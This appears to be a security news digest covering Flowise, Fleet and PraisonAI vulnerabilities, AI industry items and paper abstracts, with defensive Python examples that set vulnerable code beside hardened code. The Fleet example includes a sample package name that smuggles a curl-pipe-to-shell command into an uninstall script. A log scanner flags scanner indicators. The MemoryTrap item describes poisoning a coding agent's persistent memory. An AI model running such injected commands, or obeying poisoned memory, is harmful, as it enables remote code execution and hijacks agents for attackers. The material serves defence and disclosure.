All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
FlowiseAI has a mass assignment vulnerability (a flaw where the server accepts client input for fields it should control itself) in its tool update endpoint. The handler does not restrict which properties an update request may set, so an authenticated user can overwrite server-controlled fields such as workspaceId, createdDate, and updatedDate. Changing workspaceId reassigns a tool to a different workspace, which breaks tenant isolation (the boundary that keeps different users' data apart) in multi-workspace deployments.
FlowiseAI has the same class of mass assignment vulnerability in its variable update endpoint: authenticated users can set internal fields such as workspaceId, createdDate, and updatedDate because the server neither validates the submitted properties nor checks that the caller is permitted to change them. An attacker can reassign variables to another workspace, again breaking tenant isolation in shared deployments.
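The two Flowise items above describe one bug class: an update handler that copies whatever the client sends onto the stored record. The following is an added illustration, not Flowise's code; the Tool record, the workspace ids and the helper names are assumptions chosen to mirror the fields the advisories name (workspaceId, createdDate, updatedDate). It shows a permissive handler next to one that allow-lists client-writable fields and enforces the tenant boundary.

```python
"""Mass assignment on an update endpoint: permissive vs. allow-listed.

Illustrative code added to this digest; it is not Flowise's code. The Tool
record, field names and workspace ids are assumptions."""
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass
class Tool:
    id: str
    name: str
    description: str
    workspaceId: str   # server-controlled: set at creation, never by a client
    createdDate: str   # server-controlled
    updatedDate: str   # server-controlled


class Forbidden(Exception):
    """Raised when a caller tries to write something it must not."""


def update_tool_vulnerable(tool: Tool, caller_workspace: str, body: dict) -> Tool:
    """Copies every key in the request body onto the record.

    Nothing distinguishes client-owned fields from server-owned ones, and the
    caller's workspace is never compared with the record's, so a body of
    {"workspaceId": "ws-B"} moves the tool into another tenant."""
    for key, value in body.items():
        setattr(tool, key, value)
    return tool


# The only fields a client may set through the update endpoint.
CLIENT_WRITABLE = frozenset({"name", "description"})


def update_tool_hardened(tool: Tool, caller_workspace: str, body: dict) -> Tool:
    """Allow-lists writable fields and enforces the tenant boundary."""
    # Tenant check: the caller may only edit records in its own workspace.
    if tool.workspaceId != caller_workspace:
        raise Forbidden("tool belongs to another workspace")
    # Reject (rather than silently drop) unexpected keys, so a client probing
    # for writable server fields gets an error instead of a misleading 200.
    unexpected = set(body) - CLIENT_WRITABLE
    if unexpected:
        raise Forbidden(f"not client-writable: {sorted(unexpected)}")
    for key in CLIENT_WRITABLE & set(body):
        setattr(tool, key, body[key])
    # Timestamps are derived server-side, never taken from the request.
    tool.updatedDate = datetime.now(timezone.utc).isoformat()
    return tool


def new_tool() -> Tool:
    """Constructed sample record owned by workspace ws-A."""
    t0 = "2024-01-01T00:00:00+00:00"
    return Tool("tool-1", "calculator", "adds numbers", "ws-A", t0, t0)


def attempt(handler, caller_workspace: str, body: dict) -> tuple[str, str]:
    """Run one update on a fresh record and report (outcome, resulting workspaceId)."""
    tool = new_tool()
    try:
        handler(tool, caller_workspace, body)
        return "applied", tool.workspaceId
    except Forbidden:
        return "forbidden", tool.workspaceId


if __name__ == "__main__":
    hostile = {"name": "calculator", "workspaceId": "ws-B",
               "createdDate": "1970-01-01T00:00:00+00:00"}
    print(attempt(update_tool_vulnerable, "ws-A", hostile))      # ('applied', 'ws-B')
    print(attempt(update_tool_hardened, "ws-A", hostile))        # ('forbidden', 'ws-A')
    print(attempt(update_tool_hardened, "ws-B", {"name": "x"}))  # ('forbidden', 'ws-A')
    print(attempt(update_tool_hardened, "ws-A", {"name": "x"}))  # ('applied', 'ws-A')
```

The hardened version rejects unknown keys outright rather than ignoring them; silently dropping them hides the probe from the attacker but also from your logs, and a 4xx on an unexpected key is the signal a detection rule can key on.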
Fleet has an injection flaw in how it handles software packages (.pkg, .deb, .rpm, .exe, and .msi files) during uninstall. Metadata from an uploaded package (information the package reports about itself) is inserted into the auto-generated uninstall script without sanitization, so a malicious package can make that script run arbitrary commands with high privileges (root on macOS/Linux, SYSTEM on Windows) when an uninstall is triggered.
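The flaw above is a template-injection problem: a string from an untrusted package becomes part of a script that later runs with high privileges. The following is an added illustration, not Fleet's code; the metadata fields, the /Applications path and the sample package names are constructed assumptions, and the macOS-style shell script stands in for whichever script type the platform uses. It shows the unsanitized generator, a generator that validates and quotes the value, and a small auditor that splits a generated script into the commands a shell would actually run, which is the check the "inspect scripts before deployment" workaround asks an operator to do by hand.

```python
"""Generating an uninstall script from package metadata: unsanitized vs. quoted.

Illustrative code added to this digest; it is not Fleet's code. Metadata
fields, paths and sample names are constructed."""
import re
import shlex

# Constructed sample metadata, as an uploaded installer might report it.
BENIGN_META = {"name": "Example App", "identifier": "com.example.app"}
MALICIOUS_META = {
    # Closes the double-quoted string, runs a download-and-execute, reopens it.
    "name": 'Example"; curl http://198.51.100.7/p.sh | sh; echo "',
    "identifier": "com.example.app",
}


def uninstall_script_vulnerable(meta: dict) -> str:
    """Interpolates the package name straight into a shell command."""
    return f'#!/bin/sh\nrm -rf "/Applications/{meta["name"]}.app"\n'


# Strict policy on what a display name may contain before it touches a script.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9 ._+-]{0,127}")


def uninstall_script_hardened(meta: dict) -> str:
    """Validates the name, then quotes it so it can only ever be one argument."""
    name = meta["name"]
    if not SAFE_NAME.fullmatch(name):
        raise ValueError("package name contains characters not allowed in scripts")
    # shlex.quote alone already prevents the breakout; the allow-list above is
    # defence in depth against names that are syntactically safe but surprising.
    target = shlex.quote(f"/Applications/{name}.app")
    return f"#!/bin/sh\nrm -rf -- {target}\n"


def commands_in(script: str) -> list[list[str]]:
    """Split a generated script into the simple commands a shell would run.

    Used to audit output before deployment: a correct uninstall script here
    consists of exactly one rm command."""
    commands: list[list[str]] = []
    for line in script.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        # punctuation_chars makes ; | & come back as their own tokens, so a
        # command list hidden behind a closed quote is split out, not swallowed.
        lexer = shlex.shlex(line, posix=True, punctuation_chars=";|&")
        lexer.whitespace_split = True
        current: list[str] = []
        for token in lexer:
            if token in {";", "|", "||", "&", "&&"}:
                if current:
                    commands.append(current)
                    current = []
            else:
                current.append(token)
        if current:
            commands.append(current)
    return commands


def audit(meta: dict, generator) -> tuple[str, list[str]]:
    """Return ("ok" | "rejected" | "injected", command names) for one generator."""
    try:
        script = generator(meta)
    except ValueError:
        return "rejected", []
    names = [cmd[0] for cmd in commands_in(script)]
    verdict = "ok" if names == ["rm"] else "injected"
    return verdict, names


if __name__ == "__main__":
    print(audit(BENIGN_META, uninstall_script_vulnerable))     # ('ok', ['rm'])
    print(audit(MALICIOUS_META, uninstall_script_vulnerable))  # ('injected', ['rm', 'curl', 'sh', 'echo'])
    print(audit(MALICIOUS_META, uninstall_script_hardened))    # ('rejected', [])
    print(audit(BENIGN_META, uninstall_script_hardened))       # ('ok', ['rm'])
```

The auditor is deliberately conservative: it only understands simple command lists, so anything it cannot reduce to a single rm invocation should go to a human rather than be deployed.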
Fleet, a device management system, had a flaw in its Windows MDM (mobile device management, the mechanism for configuring and controlling enrolled devices) endpoint: requests that presented no valid client certificate (the credential that proves a device's identity) were accepted as if they came from an authenticated device. An attacker who knew a valid device identifier could impersonate that device and receive the configuration intended for it, including Wi-Fi passwords or VPN settings.
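The Fleet MDM item above is a fail-open check: the absence of a certificate was not treated as a failure. The following is an added illustration, not Fleet's code; the request and certificate shapes, device ids and profile contents are constructed assumptions standing in for the TLS layer's verified client certificate and the per-device configuration the endpoint serves. It shows the fail-open handler beside one that fails closed and also binds the claimed device identifier to the certificate, so an enrolled device cannot fetch a different device's profile either.

```python
"""Windows MDM-style endpoint: fail-open vs. fail-closed client-certificate check.

Illustrative code added to this digest; it is not Fleet's code. Request shape,
device ids and profiles are constructed."""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ClientCert:
    subject_cn: str      # device identifier the enrollment certificate was issued to
    chain_valid: bool    # result of chain validation against the MDM CA


@dataclass(frozen=True)
class MdmRequest:
    device_id: str                 # identifier the client claims in the request
    cert: Optional[ClientCert]     # None when the client presented no certificate


# Constructed per-device configuration; in practice Wi-Fi/VPN profiles.
PROFILES = {
    "DEV-0001": {"WiFi": {"ssid": "corp", "psk": "[redacted]"}},
    "DEV-0002": {"VPN": {"server": "vpn.example.test", "secret": "[redacted]"}},
}


def serve_profile_vulnerable(req: MdmRequest):
    """Only rejects a certificate that is present *and* invalid.

    A request with no certificate at all falls through as trusted, so anyone
    who knows a device identifier receives that device's profile."""
    if req.cert is not None and not req.cert.chain_valid:
        return 401, None
    return 200, PROFILES.get(req.device_id)


def serve_profile_hardened(req: MdmRequest):
    """Fail closed, then bind the claimed identity to the certificate."""
    if req.cert is None or not req.cert.chain_valid:
        return 401, None
    # Presenting *a* valid certificate is not enough: an enrolled device must
    # not be able to fetch another device's configuration by changing the id.
    if req.cert.subject_cn != req.device_id:
        return 403, None
    profile = PROFILES.get(req.device_id)
    return (200, profile) if profile is not None else (404, None)


def status_of(handler, req: MdmRequest) -> int:
    """HTTP status a handler returns for a request (profile body discarded)."""
    return handler(req)[0]


if __name__ == "__main__":
    no_cert = MdmRequest("DEV-0001", None)
    own = MdmRequest("DEV-0001", ClientCert("DEV-0001", True))
    other = MdmRequest("DEV-0002", ClientCert("DEV-0001", True))
    print(status_of(serve_profile_vulnerable, no_cert))  # 200, profile leaked
    print(status_of(serve_profile_hardened, no_cert))    # 401
    print(status_of(serve_profile_hardened, own))        # 200
    print(status_of(serve_profile_hardened, other))      # 403
```

The "disable Windows MDM" workaround listed later on this page is the operational equivalent of the first check: with no endpoint to answer, a missing certificate cannot be mistaken for a trusted one.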
Agentic AI (systems that can independently plan and take actions to complete tasks) offers significant potential for financial services, but its success depends primarily on the quality, security, and accessibility of its underlying data rather than the sophistication of the AI itself. Financial services companies must establish centralized, well-indexed, and secure data stores that can be searched and managed at scale, while ensuring all data processes are auditable and explainable to meet regulatory requirements and avoid errors like hallucinations (false or made-up information from the AI).
Codex, an AI coding assistant, is now available in the ChatGPT mobile app, allowing users to manage and guide AI-assisted coding work from their phones while Codex runs on their laptops or remote machines. The mobile app lets users review outputs, approve commands, answer questions, and provide direction to Codex in real time from anywhere, with a secure relay layer (an encrypted connection system) protecting machines from direct internet exposure while syncing updates between devices.
PraisonAI, an open-source framework for building multi-agent AI systems, has a critical authentication bypass vulnerability (CVE-2026-44338, CVSS score 7.3): its default API server ships with authentication disabled, so anyone can reach protected endpoints and trigger workflows without permission. Threat actors began exploiting it within hours of public disclosure, scanning internet-exposed instances to confirm the vulnerable endpoints were reachable.
PraisonAI, an open-source AI orchestration framework (software that coordinates multiple AI components), had a critical flaw in which authentication (verification of user identity) was disabled by default in its API server, allowing anyone on the internet to reach AI workflows without permission. Attackers began scanning for vulnerable systems less than four hours after the vulnerability was publicly disclosed, prompting urgent calls for affected organizations to update immediately.
Elon Musk and Sam Altman, former cofounders of OpenAI, are in a legal dispute over whether Altman and another executive deceived Musk about converting the organization from non-profit to for-profit structure. The article argues that focusing on this personal conflict distracts from deeper problems with AI itself.
PraisonAI, a framework for deploying autonomous AI agents, had a critical authentication bypass vulnerability (CVE-2026-44338) in versions 2.5.6 through 4.6.33: a legacy Flask API server shipped with authentication disabled by default, allowing unauthenticated attackers to read agent configurations and trigger workflows. Attackers began scanning for and testing the flaw less than four hours after public disclosure, an illustration of how AI tooling is shortening the gap between disclosure and exploitation.
Fix (Fleet, uninstall script injection): The source gives two workarounds and no patched version number: (1) do not upload software packages from untrusted or unverified sources, and (2) manually inspect and edit auto-generated uninstall scripts before deployment. An immediate upgrade is referenced as an option, but no specific patched version is named.
Source: GitHub Advisory Database
Fix (Fleet, Windows MDM client certificate): If an immediate upgrade is not possible, affected Fleet users should temporarily disable Windows MDM.
Source: GitHub Advisory Database
Companies are shifting away from relying on third-party AI providers because they worry about losing control of their proprietary data and competitive advantage when that data passes through external systems. This movement toward AI and data sovereignty, meaning companies want to build and control their own AI models rather than depend on centralized cloud providers, is now a major business priority: 70% of executives surveyed believe they need sovereign data and AI platforms to succeed.
AI chatbots like Gemini are exposing people's private phone numbers by revealing personally identifiable information (personal details like names and contact info) that was present in their training data, making private contact information much easier for the public to find. Victims have little ability to stop these privacy breaches once their information is already in the AI system.
This research paper presents MPV, a method for restricting access to master keys in multi-user Paillier systems (a cryptographic system that allows certain calculations on encrypted data without decrypting it first) by using mixed ciphertexts (encrypted data created with different encryption methods combined). The approach aims to improve security by preventing unauthorized parties from decrypting sensitive information even if they gain access to the master key.
Fix (PraisonAI, CVE-2026-44338): Patched in version 4.6.34. Users are advised to apply the latest fixes as soon as possible, audit existing deployments, review model-provider billing for suspicious activity, and rotate any credentials referenced in 'agents.yaml'.
Source: The Hacker News
Fix (PraisonAI, CVE-2026-44338): Sysdig urged organizations to upgrade immediately to PraisonAI 4.6.34 or later, which removes the vulnerable legacy API behavior and adds stronger authentication protections, and to stop using the legacy "api_server.py" entrypoint entirely. Until an upgrade is possible, defenders were advised to monitor network traffic for requests carrying the "CVE-Detector/1.0" user-agent string and for suspicious requests to /agents, /chat, /api/agents, and related endpoints.
Source: CSO Online
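The interim monitoring advice above names two indicators: a scanner user-agent and a short list of agent endpoints. The following is an added detection example, not Sysdig's, PraisonAI's or The Hacker News' code; it parses combined-format web server log lines and flags either indicator. The log lines, timestamps and source addresses are constructed samples (documentation IP ranges), and treating a successful (2xx) response on an agent endpoint as a completed unauthenticated action is an assumption that holds for an unpatched deployment.

```python
"""Flag requests matching the PraisonAI scanning indicators in an access log.

Illustrative detection code added to this digest. Log lines, addresses and
timestamps are constructed; the indicators are the ones in the advisory."""
import re
from dataclasses import dataclass

# Combined log format: src ident user [time] "METHOD path proto" status size "referer" "ua"
COMBINED_LOG = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

SCANNER_UA = "CVE-Detector/1.0"
# Endpoint prefixes named in the advisory; sub-paths (e.g. /api/agents/list) count too.
SENSITIVE_PATHS = ("/agents", "/chat", "/api/agents")


@dataclass(frozen=True)
class Alert:
    src: str
    path: str
    reason: str


def sensitive_path(path: str) -> bool:
    """True for an advisory endpoint or anything beneath it; query string ignored."""
    path = path.split("?", 1)[0]
    return any(path == p or path.startswith(p + "/") for p in SENSITIVE_PATHS)


def scan(lines: list[str]) -> list[Alert]:
    """Return one alert per line that matches an indicator.

    The scanner user-agent is flagged on any path. Otherwise a hit on a
    sensitive path that the server answered with 2xx is flagged: on an
    unauthenticated deployment that is a completed configuration read or
    workflow trigger. A 401/403 there is the patched behaviour and is not
    alerted on (it would be a candidate for a lower-severity "probe" rule)."""
    alerts: list[Alert] = []
    for line in lines:
        m = COMBINED_LOG.match(line)
        if not m:
            continue  # malformed line; real tooling should count these
        src, path, ua, status = m["src"], m["path"], m["ua"], int(m["status"])
        if SCANNER_UA in ua:
            alerts.append(Alert(src, path, "scanner user-agent"))
        elif sensitive_path(path) and 200 <= status < 300:
            alerts.append(Alert(src, path, "unauthenticated hit on agent endpoint"))
    return alerts


# Constructed sample log lines (combined log format).
SAMPLE_LOG = [
    '198.51.100.23 - - [10/Mar/2026:14:02:11 +0000] "GET /agents HTTP/1.1" 200 412 "-" "CVE-Detector/1.0"',
    '198.51.100.23 - - [10/Mar/2026:14:02:12 +0000] "POST /chat HTTP/1.1" 200 88 "-" "CVE-Detector/1.0"',
    '203.0.113.9 - - [10/Mar/2026:14:05:40 +0000] "GET /api/agents/list HTTP/1.1" 200 1533 "-" "python-requests/2.31"',
    '203.0.113.9 - - [10/Mar/2026:14:05:41 +0000] "GET /static/app.js HTTP/1.1" 200 9811 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [10/Mar/2026:14:09:02 +0000] "GET /agents HTTP/1.1" 401 0 "-" "curl/8.4.0"',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The user-agent match is the cheap signal and will disappear as soon as scanners change the string; the path-plus-status rule is the one worth keeping after the upgrade, since a 2xx on those endpoints without an authenticated session should no longer occur at all.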
AI hallucinations are confident but factually incorrect outputs that pose serious security risks, especially in cybersecurity, where they can drive automated decisions. Because AI models generate responses from statistical patterns rather than verified facts, they may cite nonexistent sources or fabricate data while sounding authoritative, potentially leading to missed threats, false alarms, or flawed security decisions. A 2025 benchmark found that most AI models tested were more likely to give a confident wrong answer than a correct one on difficult questions.
Modern AI systems like Anthropic's Claude Mythos Preview are becoming very good at finding software vulnerabilities (weaknesses in code that attackers can exploit), which creates both serious risks and benefits. Attackers could use these AI systems to automatically discover and exploit vulnerabilities in critical systems worldwide, but defenders can use the same technology to find and patch those vulnerabilities before attackers do, ultimately making software more secure long-term.
Fix (PraisonAI, CVE-2026-44338): Resolved in PraisonAI version 4.6.34; organizations should update their deployments as soon as possible.
Source: SecurityWeek
Deepfake pornography increasingly uses adult content creators' bodies without consent, either by placing other people's faces onto their bodies or by using their work as training data for AI-generated nude images (synthetic sexual imagery created by artificial intelligence). This practice threatens creators' livelihoods, mental health, and safety, as their digital doubles may perform sex acts they never agreed to or be used in scams, while society largely ignores the harm to the bodies being exploited.
AI agents (software systems that can plan and take actions over time) that retain memory between sessions create a security risk called Memory & Context Poisoning, where attackers can inject malicious instructions into persistent storage that the agent continues to trust and follow in future interactions. Researchers found a vulnerability called MemoryTrap in Claude Code where a developer could unknowingly approve a malicious dependency that would persist in the agent's memory and configuration files, poisoning the agent's behavior across multiple projects and sessions. The core problem is that agents treat stored memory, configuration files, and hooks as trustworthy guidance without validating whether they contain attacker-controlled content.
Fix (Claude Code, MemoryTrap): Anthropic released Claude Code v2.1.50, which removes user memories from the system prompt (the core instructions that guide the AI's behavior) to close the specific attack path MemoryTrap exploited.
Source: OWASP GenAI Security
This academic publication discusses PUF (physically unclonable functions, unique fingerprints built into hardware chips that are nearly impossible to copy) optimization methods for authenticating IoT devices (internet-connected devices such as smart home sensors). The research focuses on improving how these hardware-based security features can be used to verify that IoT devices are genuine and trustworthy.
This academic paper presents a method using AI to extract entities (named items like organizations or IP addresses) and relationships between them from threat intelligence data about APT (advanced persistent threat, a type of sophisticated cyberattack) attacks. The researchers developed a system to help security analysts automatically identify and organize complex attack patterns from unstructured text documents.
This research paper presents a method for optimally placing honeypots (decoy systems designed to attract and monitor attackers) in networks where multiple attackers operate simultaneously, using Bayesian Stackelberg Games (a mathematical framework for strategic decision-making under incomplete information). The approach aims to help defenders allocate honeypots more effectively by predicting attacker behavior and making strategic placement decisions.